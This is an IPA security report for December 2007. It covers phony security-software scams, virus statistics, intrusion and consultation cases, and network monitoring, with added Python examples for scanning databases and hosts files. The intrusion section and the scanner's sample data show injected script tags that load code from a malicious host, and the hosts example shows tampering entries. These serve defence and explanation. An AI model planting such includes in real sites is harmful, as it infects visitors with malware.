This is a summary of the computer virus/unauthorized computer access incident reports for December 2007, together with the annual review of 2007, compiled by IPA.
I. Reminder for the Month: “You may have been deceived by those messages…?”
- Be cautious with the hard selling of phony security measures software!! -
IPA receives a relatively large number of consultations from users every month about the hard selling of phony security measures software. In one such consultation, the user had installed the software without hesitation because its product name was written in Japanese (in Roman characters), which made it look natural. Hard selling of phony security measures software is not a new technique in itself; until now, a number of users were able to avoid damage because the messages displayed and the product names were mostly written in English. Recently, however, messages and product names written in Japanese with Roman characters, such as (i) VirusuWadame (No viruses), (ii) KyoiKanshi (Threat monitoring) and (iii) Kansen Nashi (No infection), have been observed. Since at a glance they do not look much different from typical security measures software, many users install them without suspicion and suffer damage as a result.
(1) What is the hard selling of phony security measures software…?
Have you ever seen a message such as “A virus has been found on your computer” or “Your computer is in an error state”, and then been recommended to “purchase the security measures software” shown on the screen to resolve the problem? In most cases this is a malicious activity that displays phony messages as if there were a problem, in an attempt to make users pay for the security measures software. Even if you pay, no problem is resolved, because there was no problem on your computer in the first place.
For instance, messages and images such as those shown in Chart 1-1 may be displayed, as if there really were problems on your computer, when you click an image in a banner ad at the top of a web page (an image ad on a homepage).
Chart 1-1: An instance of a phony message
It then prompts you to click the button shown in Chart 1-1 (b) if you wish to know further details of the problems. In fact, clicking the button leads you to download phony security measures software. The phony software often behaves differently from typical legitimate security measures software: once installed on your computer, the “phony security measures software” continually displays messages on the screen prompting you to purchase the software, over and over, until you pay with your credit card.
(2) Measures
“Phony security measures software” is often priced relatively cheaply. Naturally, some users prefer to pay for it as a shortcut when they do not know how to remove the message and do not want to keep being pestered by the message prompting them to purchase the software. Be cautious! Even if you pay, the messages urging you to purchase the security measures software will not stop. You should never, ever pay for it.
You should not hastily click any button on the screen, even if a message like the one shown in Chart 1-1 appears while you are browsing a web page. The best measure is to close the browser immediately and go no further. Generally, legitimate manufacturers and vendors of security measures software do not send messages like the one shown in Chart 1-1 unsolicited.
If you have inadvertently installed the “security measures software” and there is no way to remove the message from the screen, uninstall the “phony security measures software” from “Add or Remove Programs”, reached by clicking the “Start” button in the bottom left-hand corner and selecting “Control Panel”.
(3) Just in case…
Some computers may become unstable, with symptoms such as being unable to connect to the Internet or running more slowly than before. When such symptoms appear, try to restore the system as described below. If the symptoms are not remedied, the last resort is to initialize your computer.
(a) Restoring the system to its normal state with the system restore function
Windows automatically selects certain days on which it stores the system state of that day, so that the state can be used if the computer later behaves unstably or shows significant trouble. Windows provides the “System Restore” function to return the computer to its normal state based on the information stored earlier. The day on which the system state is stored can also be set by the user.
Please refer to Microsoft's web page on restoring the normal state with the Windows “System Restore” function. Note also that if you installed application software, applied updates, etc. between the selected day and today, you will have to redo them after the system has been fully restored, because the previously installed patches, etc. will no longer be applied. However, documents created between the selected day and today, incoming and outgoing e-mails, URLs you accessed and favorite URLs you bookmarked are kept.
“System Restore”
http://www.microsoft.com/windowsxp/using/setup/support/sysrestore.mspx
(b) Initialization of the computer
This is the work of returning your computer to the state it was in when purchased. For the actual procedure, please follow the “returning the computer to its state at purchase” section of the instruction manual that came with your computer. Be sure to back up important data and information to external media, etc. before you begin the initialization work.
*IPA will not bear responsibility for any troubles, losses or damages caused by the said initialization work conducted by you. The work should be carried out with calm judgment, entirely at your own responsibility.
<Reference>
IPA – Seven Virus Requirements for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
IPA – Five Anti-spyware Requirements for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/spyware5kajyou.html
II. Reporting Status for Computer Virus
– for further details, please refer to Attachment 1 –
The detection number [1] of viruses in December was about 0.34M, a decrease of about 40% from the 0.60M reported in November. In addition, the reported number [2] for December was 2,239, also a decrease of 4.8% from the 2,351 reported in November.
[1] Detection number: the cumulative count of viruses found by a filer, as reported.
[2] Reported number: virus counts are aggregated: viruses of the same type and its variants reported by the same filer on the same day are counted as one case, regardless of how many viruses (or how many actual copies) that filer found on that day. In December, the reported number was 2,239, while the aggregated virus detection number was about 0.34M.
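To make the difference between the two figures concrete, here is an added Python example (not code from IPA's report) that applies the counting rule above to a constructed set of reports: the detection number is the raw sum of viruses found, while the reported number counts one case per filer, per day, per virus family. The rule for folding variants into a family (dropping the suffix after the last dot, e.g. W32/Netsky.Q into W32/Netsky) and the sample reports are assumptions made for the example.

```python
from collections import defaultdict


def virus_family(name):
    """Fold a variant name into its family.

    Assumption for this example: the variant suffix follows the last dot,
    so "W32/Netsky.Q" and "W32/Netsky.D" both map to "W32/Netsky".
    """
    return name.rsplit(".", 1)[0]


def aggregate(reports):
    """Apply the counting rule to (date, filer, virus_name, detections) tuples.

    Returns (reported_number, detection_number, cases), where cases maps
    (date, filer, family) to the detections folded into that single case.
    """
    cases = defaultdict(int)
    detection_number = 0
    for date, filer, name, detections in reports:
        # Same filer, same day, same family (any variant) -> one case
        cases[(date, filer, virus_family(name))] += detections
        detection_number += detections
    return len(cases), detection_number, dict(cases)


def top_families(cases, n=3):
    """Rank families by total detections, as in the monthly ranking."""
    totals = defaultdict(int)
    for (_date, _filer, family), detections in cases.items():
        totals[family] += detections
    return sorted(totals.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


# Constructed sample reports (not real IPA data)
SAMPLE_REPORTS = [
    ("2007-12-03", "filer-A", "W32/Netsky.Q", 120),
    ("2007-12-03", "filer-A", "W32/Netsky.D", 35),   # variant, same day, same filer -> same case
    ("2007-12-03", "filer-A", "W32/Stration.G", 4),  # different family -> separate case
    ("2007-12-04", "filer-A", "W32/Netsky.Q", 98),   # next day -> new case
    ("2007-12-03", "filer-B", "W32/Netsky.Q", 1),    # different filer -> separate case
]

if __name__ == "__main__":
    reported, detected, cases = aggregate(SAMPLE_REPORTS)
    print(f"reported number: {reported}, detection number: {detected}")
    for family, total in top_families(cases):
        print(f"  {family}: {total}")
```

With the constructed rows, five report lines collapse into four cases (the two Netsky variants from filer-A on 3 December are one case) while the detection number stays at the raw sum of 258, which is the same relationship the report shows between 2,239 cases and about 0.34M detections.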
The virus with the largest detection number was W32/Netsky with about 0.30M, followed by W32/Stration with about 0.023M and W32/Mytob with about 0.011M.

Chart 2-1

Chart 2-2
Note) Numbers in parentheses are the numbers for the previous month.
III. Reporting Status for Unauthorized Computer Access (includes Consultations)
– please refer to Attachment 2 –
Report for unauthorized computer access and status of consultation

|                             | July | Aug. | Sept. | Oct. | Nov. | Dec. |
| Total for Reported (a)      |  10  |  16  |  10   |  10  |  15  |  14  |
|   Damaged (b)               |   8  |  13  |   8   |   9  |  11  |   7  |
|   Not Damaged (c)           |   2  |   3  |   2   |   1  |   4  |   7  |
| Total for Consultation (d)  |  25  |  23  |  27   |  37  |  31  |  21  |
|   Damaged (e)               |  11  |  15  |  12   |  22  |  17  |  16  |
|   Not Damaged (f)           |  14  |   8  |  15   |  15  |  14  |   5  |
| Grand Total (a + d)         |  35  |  39  |  37   |  47  |  46  |  35  |
|   Damaged (b + e)           |  19  |  28  |  20   |  31  |  28  |  23  |
|   Not Damaged (c + f)       |  16  |  11  |  17   |  16  |  18  |  12  |
(1) Reporting Status for Unauthorized Computer Access
The reported number for December was 14, of which 7 involved actual damage.
(2) Accepting Status for Consultations relevant to Unauthorized Computer Access
The number of consultations relevant to unauthorized computer access was 21, of which 16 (2 of which were also counted as reports) involved some sort of damage.
(3) Status of Damage
The breakdown of reported damage was: intrusion, 4; DoS attack, 1; and others (damaged), 2. The damage from intrusion was mainly alteration of web contents (4 cases), of which 2 were truly harmful: traps were embedded that automatically sent visitors to a malicious site which induced them to download a virus simply by accessing the altered site. In addition, 1 case of placing malicious content to be exploited for phishing was also counted.
The causes of intrusion were: insufficient configuration, 1; for the other 3 cases the cause could not be identified, but it can be assumed that vulnerabilities left in the server OS or in applications were the major causes. As for the causes of the others (damaged), 1 case was counted in which the user's avatar and/or virtual money used in an RPG (role playing game) went missing.
*Phishing: a malicious technique that lures users to fake web pages spoofing real businesses such as legitimate financial institutions, in order to steal users' IDs and passwords.
(4) Damage Instances:
[Intrusion]
(i) Web site was altered…
<Instance>
- A general user who browsed this business's site reported that “virus alerts were raised by anti-virus software as soon as the user accessed the site”.
- An investigation found that a number of fields within a database had been altered to contain the following code: <script src="http://(omitted).net/0.js"></script>.
- Because of this script, a user automatically downloaded a virus simply by browsing the site.
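As a defender-side check for the kind of alteration described in this instance, here is an added Python example (not part of IPA's report) that scans content fields dumped from a web site's database for <script> tags whose src points at a host outside the site's own allowlist. The allowlist, the record layout and the sample rows are constructed for the example, and the malicious host name is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist of hosts the site legitimately loads scripts from (assumption)
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.jp"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                # Strip padding such as the leading space seen in the injected tag
                self.srcs.append(value.strip())


def find_foreign_script_srcs(fragment, allowed_hosts):
    """Return script src values whose host is not on the allowlist.

    Relative paths (no host) are treated as the site's own and ignored;
    protocol-relative "//host/x.js" is resolved to its host.
    """
    collector = ScriptSrcCollector()
    collector.feed(fragment)
    collector.close()
    suspicious = []
    for src in collector.srcs:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            suspicious.append(src)
    return suspicious


def scan_records(records, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan (record_id, field, html_value) rows, e.g. dumped from the CMS
    database, and report every record/field carrying a foreign script include."""
    findings = []
    for record_id, field, value in records:
        for src in find_foreign_script_srcs(value, allowed_hosts):
            findings.append((record_id, field, src))
    return findings


# Constructed database rows (not from the reported incident)
SAMPLE_RECORDS = [
    ("prod-1001", "description", '<p>Tea set</p><script src="/js/site.js"></script>'),
    ("prod-1002", "description", '<p>Green tea</p><script src=" http://malware-host.example.net/0.js"></script>'),
    ("prod-1003", "description", "<p>Black tea</p><script src='//malware-host.example.net/0.js'></script>"),
    ("news-7", "body", '<script src="https://www.example-shop.jp/js/banner.js"></script><p>News</p>'),
]

if __name__ == "__main__":
    for record_id, field, src in scan_records(SAMPLE_RECORDS):
        print(f"{record_id}.{field}: foreign script include {src}")
```

Running the scan over a full export of the content tables (rather than grepping the rendered pages) finds the injected fields directly, which is what the investigation in this instance had to do by hand; an allowlist keyed on host rather than full URL keeps the check stable when legitimate script paths change.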
[Others (Damaged)]
(ii) Items used in online games went missing…
<Instance>
- Because of my home computer's failure, I had been playing an RPG (role playing game) at a comic café.
- When I logged in again a couple of days later, my avatar was in a different location from where I had previously logged out.
- I felt it was suspicious and investigated. Then I realized that some arms for my avatar and virtual money used in the online game were missing.
- According to my game buddies, they had seen someone logged in as me while I was away from the game.
IV. Accepting Status of Consultation
The gross number of consultations in December was 389. Consultations relevant to “One-click Billing Fraud” decreased significantly, to 43 (November: 264). This may be because an offender in a one-click billing fraud was arrested at the end of November last year. Among the others, consultations relevant to “Winny” numbered 19 (November: 31) and consultations relevant to “hard selling of phony security measures software” numbered 11 (November: 14).
Movement in the entire number of consultations accepted by IPA, by method

|                             | July | Aug. | Sept. | Oct. | Nov. | Dec. |
| Total                       | 1162 | 1013 |  910  | 1128 |  911 |  389 |
|   Automatic Response System |  694 |  593 |  544  |  669 |  520 |  222 |
|   Telephone                 |  403 |  374 |  310  |  397 |  337 |  109 |
|   e-mail                    |   64 |   43 |   55  |   57 |   52 |   56 |
|   Fax, Others               |    1 |    3 |    1  |    5 |    2 |    2 |
*IPA provides consultation and advice on computer viruses and unauthorized computer access, as well as on other information security issues in general.
Mail: for virus issues, for crack issues.
Tel.: +81-3-5978-7509 (24-hour automatic response)
Fax: +81-3-5978-7518 (24-hour automatic response)
*The Total case number includes the numbers in the Consultation (d) column of the chart in “IV. Reported Status for Unauthorized Computer Access” and “V. Accepting Status of Consultation”.
*“Automatic Response System”: number of consultations accepted by the automatic response system
*“Telephone”: number of consultations accepted by Security Center personnel
<Reference>
Shift in the Number of Consultations relevant to One-click Billing Fraud
The major consultation instances are as follows.
(i) Data stored on a privately owned computer leaked onto the Winny network…
Consultation:
I am using Winny on a privately owned computer. Materials for my work are also stored on that computer. One day, I found a posting on an electronic bulletin board saying that the data stored on a computer was being leaked. I checked and realized that the data in question had leaked from my computer. My computer was probably infected by a virus, causing the data to leak. Could you tell me how I should respond?
Response:
Since it is highly probable that the data used for your work has leaked as well, be sure to carry out the following procedures:
(1) Report to the parties involved
Immediately inform the parties involved in the work, including your supervisor. Do not try to fix it on your own: be sure to follow the instructions provided by the emergency response team (department) in your company.
(2) Handling the computer
First of all, the computer from which the information leaked should be disconnected from the Internet. Do not remove Winny or delete files on that computer at this stage, as they are necessary to identify the data that leaked.
For the other procedures, please refer to the following URLs.
<Reference>
IPA – How to Prevent Information Leakage by Winny (in Japanese)
http://www.ipa.go.jp/security/topics/20060310_winny.html
IPA – Responding Tips for Information Leakage Accidents (in Japanese)
http://www.ipa.go.jp/security/awareness/johorouei/
(ii) Being infected by a virus…?
Consultation:
I have had the following symptoms for a couple of weeks. My computer may be infected by a virus.
- I tried to update my computer, but the relevant pages do not appear.
- Anti-virus software cannot be downloaded.
- Anti-virus software vendors' sites cannot be browsed (other sites appear).
- When I tried to run a free online virus scan, I was automatically sent to an unrelated shopping site, or the computer displayed “unable to display your requested pages.”, etc.
Response:
Investigation revealed that traps blocking access to legitimate sites had been embedded (hosts file alteration). It is highly probable that your computer was infected by a virus. We attempted a system restore, but the function itself had already been disabled. Since the damage caused by the virus had spread widely, we encourage you to initialize your computer. As this case shows, it is very difficult to recover once a computer is infected by a virus. Accordingly, it is important to take preventive measures on a routine basis.
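The hosts file alteration described in the response above can be checked for mechanically. The following Python script, added here as an example and not part of IPA's report, parses hosts file content and flags entries that pin OS update or anti-virus vendor domains to a fixed address, distinguishing entries that block a site (loopback or 0.0.0.0) from entries that redirect it elsewhere. The watch-list of domain suffixes and the sample hosts content are constructed for the example.

```python
import ipaddress

# Constructed watch-list (an assumption, not from IPA): domains that a hosts
# file hijack typically blocks or redirects, i.e. OS update and AV vendor sites
WATCHED_SUFFIXES = (
    "windowsupdate.com",
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
    "symantec.com",
    "trendmicro.com",
    "mcafee.com",
)


def parse_hosts(text):
    """Return (line_number, ip_address, hostname) for every mapping in a hosts file."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and padding
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                              # malformed line, not a mapping
        for name in fields[1:]:
            entries.append((lineno, ip, name.lower()))
    return entries


def is_watched(hostname):
    return any(hostname == s or hostname.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_hijacks(text):
    """Flag hosts file entries that pin a watched domain to a fixed address.

    A stock hosts file only maps localhost, so any entry for a watched domain
    is suspicious: loopback/unspecified targets make the site unreachable
    ("blocked"); anything else sends the user to an address of the attacker's
    choosing ("redirected").
    """
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if not is_watched(name):
            continue
        kind = "blocked" if (ip.is_loopback or ip.is_unspecified) else "redirected"
        findings.append((lineno, name, str(ip), kind))
    return findings


# Constructed hosts file content resembling a tampered Windows XP hosts file
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
127.0.0.1       www.symantec.com            # injected: vendor site unreachable
127.0.0.1       liveupdate.symantec.com
0.0.0.0         windowsupdate.microsoft.com
192.0.2.45      www.trendmicro.com          # injected: redirect to a TEST-NET address
"""

if __name__ == "__main__":
    # On Windows the real file is %SystemRoot%\System32\drivers\etc\hosts
    for lineno, name, ip, kind in find_hijacks(SAMPLE_HOSTS):
        print(f"line {lineno}: {name} -> {ip} ({kind})")
```

To check a real machine, read %SystemRoot%\System32\drivers\etc\hosts and pass its text to find_hijacks. "Blocked" entries explain the symptoms in this consultation (update pages and vendor sites not appearing); "redirected" entries match being sent to an unrelated site when an online scan is attempted.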
<Reference>
IPA – Seven Virus Requirements for Computer Users (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
V. Access Status Captured by Internet Monitoring (TALOT2) in December
According to Internet Monitoring (TALOT2), the total number of unwanted (one-sided) accesses in December 2007 was 218,942 for 10 monitoring points. That is, there were 706 accesses from 235 source addresses per monitoring point per day.
Since each TALOT2 monitoring environment is nearly equivalent to the connection environment generally used for the Internet, it can be considered that the same amount of unwanted (one-sided) access is observed in general Internet users' connection environments. In other words, your computer is being accessed from 235 unknown source addresses per day on average, and each such source address accesses you about 3 times, which is considered unauthorized.

Chart 5-1: Unwanted (One-sided) Number of Accesses and Number of Source Addresses per Monitoring Point per Day
Chart 5-1 shows the unwanted (one-sided) number of accesses and number of source addresses per monitoring point per day from January to December 2007. According to the chart, both figures for December decreased from November and were the lowest of 2007 for number of accesses and number of source addresses per day. Otherwise, the nature of the accesses appeared to be entirely stable.
Both unwanted (one-sided) access figures per day, by month in 2007, tended to decrease moderately from June onward regardless of the type of access (see Chart 5-2).

Chart 5-2: Shift in Access Type (Destination) per Monitoring Point per Day

Chart 5-3: Unwanted (One-sided) Number of Accesses and Number of Source Addresses per Monitoring Point per Day from June 2004 to December 2007
It is not certain why the number of accesses and the number of source addresses decreased. Possible causes are:
(1) Significant infection damage by worms and/or viruses targeting Windows vulnerabilities has decreased;
(2) The effects of the anti-bot measures provided by the CCC (Cyber Clean Center), the collaborative project between MIC (Ministry of Internal Affairs and Communications) and METI (Ministry of Economy, Trade and Industry);
(3) Security measures have improved as the computers used by individual users and businesses are replaced by newer ones or run more sophisticated OSs.
As for (1) above, this can also be seen in the decreasing reported numbers and detection numbers of viruses in the computer virus report; in addition, the anti-spam and anti-virus measures taken by the respective providers have mainly served to prevent infection damage from spreading.
<Referential Information>
Reporting Status of Computer Virus for 2007
http://www.ipa.go.jp/security/english/virus/press/200712/virus2007.html
(2) above appears to be effective against accesses originating from bot viruses. The CCC distributes bot removal tools and, in collaboration with ISPs (Internet Service Providers), sends virus alert e-mails to users whose computers may have been infected by a bot virus.
<Referential Information>
CCC (Cyber Clean Center), the collaborative project between MIC and METI (in Japanese/partially in English)
https://www.ccc.go.jp/en_index.html
Bot Removal Procedures (in Japanese)
https://www.ccc.go.jp/flow/index.html
Alerting Activities (in Japanese)
https://www.ccc.go.jp/activity/index.html
Brochure for Anti-bot Measures (PDF file)
http://www.ipa.go.jp/security/english/virus/antivirus/pdf/Bot_measures_eng.pdf
As for (3) above, the newer OS (Windows Vista) was released in January 2007; we assume that when individual and business users move to newer OSs and/or systems, bot viruses, etc. are discarded along with the legacy computers and/or systems, even where worms and viruses had infected them without the users' knowledge.
In addition, newer OSs and systems come with up-to-date anti-virus software by default, even if only as a limited-time offer: users should not miss this excellent opportunity to obtain the latest security protection!
In relation to the above information, please also refer to the following for further details.
- Attachment 3: Observation Status by Internet Monitoring System (TALOT2)
- Attachment 4: “Report Status for Computer Virus 2007”
- Attachment 5: “Report Status for Unauthorized Computer Access 2007”